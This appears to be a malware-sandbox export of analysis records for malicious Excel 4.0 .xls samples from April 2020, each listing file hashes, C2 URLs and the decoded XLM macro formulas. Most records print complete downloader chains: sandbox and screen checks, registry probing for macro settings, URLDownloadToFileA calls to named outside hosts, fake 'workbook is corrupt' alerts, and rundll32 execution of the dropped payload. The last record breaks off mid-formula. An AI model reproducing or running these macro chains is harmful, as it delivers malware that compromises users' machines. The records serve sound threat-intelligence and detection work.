{"version":"0.2","sample":{"sample":"","kind":"file","target":"b397bdd9583f4ec0ea6e6eb77ab8cafe637d28efec907b96e324416bd714e674"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b397bdd9583f4ec0ea6e6eb77ab8cafe637d28efec907b96e324416bd714e674","filesize":147968,"md5":"b357c5ee952ff47e0c70402e8f0d6970","sha1":"d0435d7c12441044d0c758d4175f51364be88aef","sha256":"b397bdd9583f4ec0ea6e6eb77ab8cafe637d28efec907b96e324416bd714e674","sha512":"9d9e91f5046f03bfe5e467ec8b298346349123322350a99a8b93224b3ef4aeb81f6ddb5b132fad29f760ada86ac8b1188f8c1ace8287179e0ccbfe38a9a33593","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b397bdd9583f4ec0ea6e6eb77ab8cafe637d28efec907b96e324416bd714e674.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"K9XRDfmrzA\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b39957b6b777aed9f72a4bbe59b19f9026ecfa85347e92f3ff906ae521b60f4a"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b39957b6b777aed9f72a4bbe59b19f9026ecfa85347e92f3ff906ae521b60f4a","filesize":147968,"md5":"4b550db2d48c03cc8e70f5cff0cba3f6","sha1":"19e2ba99d37f9c58ee589f196268a3ce8cc6655f","sha256":"b39957b6b777aed9f72a4bbe59b19f9026ecfa85347e92f3ff906ae521b60f4a","sha512":"de0613401fabfe3b775d0cadb905a00c70b7ad95c97bdea3ba24bf05318663c3e32156a4fca34bd59ad7de52880f93a621d0f386ccb5e9aa0e5953dabc4a6df4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b39957b6b777aed9f72a4bbe59b19f9026ecfa85347e92f3ff906ae521b60f4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"mquQGc9stk\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3a70c993ecb6c256391f045cfac2c98984704922e7042c16d15ee6132bc4827"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3a70c993ecb6c256391f045cfac2c98984704922e7042c16d15ee6132bc4827","filesize":116224,"md5":"485cf44b008ca28f624b3e1ba65a9aa2","sha1":"37d3aeb9f278edc118e2d40c5a7baed246c5b98b","sha256":"b3a70c993ecb6c256391f045cfac2c98984704922e7042c16d15ee6132bc4827","sha512":"1a6dd52d74bb92bcdcf6bdb29ba903e9032d7f199e3e69696a0a4ffd2df192eaea4bf06354dbecfb41ea5535592942699b071968453349ac29b3972786d4e366","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3a70c993ecb6c256391f045cfac2c98984704922e7042c16d15ee6132bc4827.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SPhoiXAi0n\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3ad3cf163073ac24c752bdf6a5cc779664cf0f8fd458be0a003b165e638b4f0"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3ad3cf163073ac24c752bdf6a5cc779664cf0f8fd458be0a003b165e638b4f0","filesize":168960,"md5":"a8ba85b227dc14db0d1955a2ce203b59","sha1":"db8ccb9c3bcdf2d3c8bb232f78b4194627939b92","sha256":"b3ad3cf163073ac24c752bdf6a5cc779664cf0f8fd458be0a003b165e638b4f0","sha512":"246b01ffeefd103452d7518163e837e0d2463da2177557ab60b3822e5eec6ebe65595d2b2de28e9e725e156160a558d410f9286d93e69780795ec2836bc56d2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3ad3cf163073ac24c752bdf6a5cc779664cf0f8fd458be0a003b165e638b4f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KhhNgWvdt2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3b024a6f982a3100ba9bd4ac6ff8e4da6b419685d5745c3777b00d978716163"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3b024a6f982a3100ba9bd4ac6ff8e4da6b419685d5745c3777b00d978716163","filesize":209920,"md5":"f257f9812c937e59e3b5c7057b8178a8","sha1":"d06b296f1ad90cd119e192cfb2d439fb4056d233","sha256":"b3b024a6f982a3100ba9bd4ac6ff8e4da6b419685d5745c3777b00d978716163","sha512":"abab7fb55c2502c9263db9278e0fda08689ba4e810986fe89abbbe6bbf83a2d5cc248c0355eb3056dd0dfc65d4e96da36af11c507e5807d9e809b3a2ae92fbfe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3b024a6f982a3100ba9bd4ac6ff8e4da6b419685d5745c3777b00d978716163.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wyjpJsWKc8\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3d3dbf83de2e637b30298048a5572097f2dc476869de5c2b64fdec07b37e5a4"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3d3dbf83de2e637b30298048a5572097f2dc476869de5c2b64fdec07b37e5a4","filesize":206336,"md5":"4d2941dbd3a87d6bc8422af0f090ae8b","sha1":"78e9a0d23be9561c64c493e8505cd35d1df5f3dd","sha256":"b3d3dbf83de2e637b30298048a5572097f2dc476869de5c2b64fdec07b37e5a4","sha512":"0a67056f5d895be35fe89b810cfcbd37cce9c320b5b6b4da92b2d30220f75370a85fe5fed34a59900cc062df5554ca98af504e9cd0659d7fbba5456681230947","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3d3dbf83de2e637b30298048a5572097f2dc476869de5c2b64fdec07b37e5a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OgKEq7PHBD\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3e21c3ba8c7bb7f8302c3ec74c07fda82654cf58fc6bebed3ca07b77a317f21"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3e21c3ba8c7bb7f8302c3ec74c07fda82654cf58fc6bebed3ca07b77a317f21","filesize":204800,"md5":"6217620d8c8f41b5569f16de073bdf25","sha1":"259ed56d5bb77e39437eef93e2b0b8ca441edf3c","sha256":"b3e21c3ba8c7bb7f8302c3ec74c07fda82654cf58fc6bebed3ca07b77a317f21","sha512":"fd2970e9eaa0bfbccff6ad1e0bbd413d60bd0ad1a0868441edc7a9edfd0853e73eb1a68992e041ddce51b7e9fdeaafe1dbcdde57308c91fb7f6f9ad24ec36e99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3e21c3ba8c7bb7f8302c3ec74c07fda82654cf58fc6bebed3ca07b77a317f21.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b40151ec8534de27ad33a82492c1ac279ad4a07b9fd3810bf704006e0b60da2e"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b40151ec8534de27ad33a82492c1ac279ad4a07b9fd3810bf704006e0b60da2e","filesize":168960,"md5":"aa894a6840181f9383da6262f8f0fff7","sha1":"9db4689cba617620d9764e94374807d403cb1c6a","sha256":"b40151ec8534de27ad33a82492c1ac279ad4a07b9fd3810bf704006e0b60da2e","sha512":"062ab4da09f2b34bff9cd2a0c8e2fea564013668bfe749a5117d099f858b59f83456bd3d5880dd5e46325e3fefc91529cdc6bff2ba971611d6c39eda036ae561","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b40151ec8534de27ad33a82492c1ac279ad4a07b9fd3810bf704006e0b60da2e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uHVzFE9d8H\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b4152aeada66ac671a47d502c43e6ee1053366af7ba5a4efcae24222f19d9553"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b4152aeada66ac671a47d502c43e6ee1053366af7ba5a4efcae24222f19d9553","filesize":112640,"md5":"59937a40437d189ca770bd89a0db5aa3","sha1":"c8d41052b5e5e9dca49699fca68e6f82a1e17c11","sha256":"b4152aeada66ac671a47d502c43e6ee1053366af7ba5a4efcae24222f19d9553","sha512":"bee675175776dc79ef1b35c7e7abee294e67f662d41619922ca4081059711b9efe85175c9348793c3fd4e85c1ac5a325081622badb6cf9763e1f6063f6f3c68e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b4152aeada66ac671a47d502c43e6ee1053366af7ba5a4efcae24222f19d9553.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b43e4aae2f827082abef94e9bcc3cfbed4852d164369caf2857126067ab7413f"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b43e4aae2f827082abef94e9bcc3cfbed4852d164369caf2857126067ab7413f","filesize":226304,"md5":"20e6693ae5afb045f511dc4198489bce","sha1":"2ef5057c06e91576ce2eb88e58e8fea794bbe30d","sha256":"b43e4aae2f827082abef94e9bcc3cfbed4852d164369caf2857126067ab7413f","sha512":"441a8f1ea7299e6dc55f9c8522ef7d55f685589d73ed466354511876fd17690096d82fca65d091aa4f04a935d1243f1386556aa0672f7f811ce16dccf21e3cb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b43e4aae2f827082abef94e9bcc3cfbed4852d164369caf2857126067ab7413f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uKxwWjTjGm\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b446296ef557a64a920a7ea7d3dc49f623539a7c0bdde55db71eed5684ceabe2"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b446296ef557a64a920a7ea7d3dc49f623539a7c0bdde55db71eed5684ceabe2","filesize":219136,"md5":"2823dae3e1730952690678f4c7c2df78","sha1":"24f547c82146973267329236effce40d4ac03cf9","sha256":"b446296ef557a64a920a7ea7d3dc49f623539a7c0bdde55db71eed5684ceabe2","sha512":"f5a2b2849d977ba51a80b47ef51662a3b38d6420ff88512c0fc36790de93d82359a084da681148fb1bf57894f9e935b803e23ff8e4808f9162ad0500cedb123e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b446296ef557a64a920a7ea7d3dc49f623539a7c0bdde55db71eed5684ceabe2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NxuAEmdUHH\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b449695000772b566b8fcb34c63a620c254ea392461ad8eb0c6a444ec60e351d"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b449695000772b566b8fcb34c63a620c254ea392461ad8eb0c6a444ec60e351d","filesize":209408,"md5":"06e9964bc3e311b1ee4a88a0986a10c5","sha1":"255b1268c379b01178acabbf00a4afb3b8780b42","sha256":"b449695000772b566b8fcb34c63a620c254ea392461ad8eb0c6a444ec60e351d","sha512":"76391b659a286106023fd8d86677b54d2eb42b95f53941a7edf4aaf3de77ab6fa8c55f55d2011b9b728b8188092c68826e6e823bb426641c1c7fb216a9eeba50","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b449695000772b566b8fcb34c63a620c254ea392461ad8eb0c6a444ec60e351d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"doqyJa3Hc1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b44fc1cca804491e11ac204d60e875c045815cb8cb16242569027f3b19461bdb"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b44fc1cca804491e11ac204d60e875c045815cb8cb16242569027f3b19461bdb","filesize":141824,"md5":"a4cd882b1ea1c340d0c06879b6b38415","sha1":"beb84a12d6cc3857832e0ca69d5e06c82d712fc0","sha256":"b44fc1cca804491e11ac204d60e875c045815cb8cb16242569027f3b19461bdb","sha512":"c440988857da8fddf15be11c7c2be870830403d2ed32d2733cb31cfda4a4e550c09a12e2a68360efb041a67716492b365e0a92fee923a2bcdcb37fd4a4fd76ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b44fc1cca804491e11ac204d60e875c045815cb8cb16242569027f3b19461bdb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"k3232KV2Br\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b468e5064cb6c87e6143d8371d350a36d0b9c6833ae2f3117f0cc4528c957e0c"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b468e5064cb6c87e6143d8371d350a36d0b9c6833ae2f3117f0cc4528c957e0c","filesize":160768,"md5":"00ccfb31033bf8e33e70941bee8578b8","sha1":"716d07c1db8f657a216c401e28f3dd3843da1664","sha256":"b468e5064cb6c87e6143d8371d350a36d0b9c6833ae2f3117f0cc4528c957e0c","sha512":"685c888eee2c5e743f073b952b0b9ba41138aecd06951fa8151ec2aaad4e6a14246de9d2cfb052229af82257ced8759d51798ad6b5ce3a4815d3a97e19eb38a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b468e5064cb6c87e6143d8371d350a36d0b9c6833ae2f3117f0cc4528c957e0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Wv1HZZW6WA\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b474e9f49643a22e71aa79c92bad728d16d23aee17476f06f6ab715c6b11ccaa"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b474e9f49643a22e71aa79c92bad728d16d23aee17476f06f6ab715c6b11ccaa","filesize":132608,"md5":"70955e72470ee34e04ec970889bd3c38","sha1":"573c4fde0965b4d645c2d125f587b014a5daf2df","sha256":"b474e9f49643a22e71aa79c92bad728d16d23aee17476f06f6ab715c6b11ccaa","sha512":"d16163c8969ad534b6646f3435778092a3753afa806b3a16ad0aa1ae291d9cd3a3408b762ef7b5c8d030e005150857883b0a175835c5bb219aae4f42cceb2226","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b474e9f49643a22e71aa79c92bad728d16d23aee17476f06f6ab715c6b11ccaa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 